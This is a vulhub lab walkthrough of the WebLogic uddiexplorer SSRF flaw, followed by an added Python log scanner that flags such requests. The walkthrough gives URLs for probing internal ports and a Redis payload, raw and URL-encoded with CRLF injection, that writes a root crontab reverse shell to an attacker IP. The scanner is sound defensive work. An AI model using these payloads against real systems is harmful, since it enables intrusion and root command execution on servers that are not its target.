WebLogic contains an SSRF vulnerability. Exploiting it lets an attacker send arbitrary HTTP requests from the server and thereby reach vulnerable components on the internal network such as Redis and FastCGI.
Setting up the test environment
cd vulhub/weblogic/ssrf
docker-compose up -d
Open http://your-ip:7001/uddiexplorer/ ; the uddiexplorer application is viewable without logging in.
Testing the SSRF vulnerability
The SSRF vulnerability is in http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp , and we test it in Burp Suite. The injection point is the operator parameter: supply a reachable IP:PORT, for example http://127.0.0.1:80 :
Probing which ports are open on the local host
http://172.16.32.134:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
Probing which ports are open on other hosts in the internal network
http://172.16.32.134:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.16.32.128:3306
Attacking Redis on the internal network
Look up the Redis IP
docker exec -it ssrf_redis_1 ip addr
Probe whether the Redis port 6379 is open
Start a listening port on Kali
Build the Redis attack script and get a reverse shell
test
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/172.16.32.130/444 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
aaa
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.16.32.130%2F4449%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
URL-encode the attack script and append it to the URL; the shell comes back successfully.
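From the defender's side, the same request shape is easy to spot in WebLogic access logs: a SearchPublicRegistries.jsp request whose operator parameter points at a loopback or private address, names a sensitive port such as 6379, or carries URL-encoded CR/LF that would smuggle extra lines into the back-end connection. The following script is an added example, not part of the original post or of vulhub; the log lines, the log format and the port list are constructed assumptions.

```python
import re
import ipaddress
from urllib.parse import urlparse, parse_qs, unquote

# Constructed WebLogic access-log lines in Apache common format (hypothetical sample).
SAMPLE_LOG = """\
172.16.32.130 - - [01/Jan/2024:10:00:01 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&btnSubmit=Search&operator=http://127.0.0.1:7001 HTTP/1.1" 200 2311
172.16.32.130 - - [01/Jan/2024:10:00:02 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&operator=http://172.16.32.128:3306 HTTP/1.1" 200 2290
172.16.32.130 - - [01/Jan/2024:10:00:03 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&operator=http://172.16.32.128:6379/test%0D%0A%0D%0Aset%201%20x%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Asave HTTP/1.1" 200 2290
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&operator=https://uddi.example.com/inquire HTTP/1.1" 200 2400
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 1800
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
SENSITIVE_PORTS = {6379: "redis", 9000: "fastcgi", 3306: "mysql"}  # assumed watch-list

def analyse_operator(value):
    """Return the reasons an 'operator' value looks like SSRF abuse (empty list = benign)."""
    reasons = []
    decoded = unquote(value)
    if "\r" in decoded or "\n" in decoded:
        reasons.append("crlf-injection")   # extra protocol lines smuggled into the request
    target = urlparse(decoded)
    host = target.hostname or ""
    try:
        if not ipaddress.ip_address(host).is_global:   # loopback, private, link-local ...
            reasons.append(f"internal-target:{host}")
    except ValueError:
        pass                                           # a hostname, not a literal IP
    if target.port in SENSITIVE_PORTS:
        reasons.append(f"sensitive-port:{SENSITIVE_PORTS[target.port]}")
    return reasons

def scan_log(text):
    """Return (line_no, operator, reasons) for every suspicious SearchPublicRegistries request."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlparse(m.group(1))
        if not url.path.endswith("/uddiexplorer/SearchPublicRegistries.jsp"):
            continue
        for op in parse_qs(url.query).get("operator", []):
            reasons = analyse_operator(op)
            if reasons:
                hits.append((n, op, reasons))
    return hits

if __name__ == "__main__":
    for n, op, reasons in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(reasons)} <- {op}")
```

Only the three requests aimed at internal addresses are reported; the request to an external UDDI registry is left alone, which is the behaviour a rule should have before it is turned into an alert.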